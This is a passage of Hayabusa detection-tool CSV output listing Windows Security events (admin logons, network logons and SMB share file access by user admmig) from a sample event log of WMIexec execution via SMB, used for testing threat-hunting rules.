10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 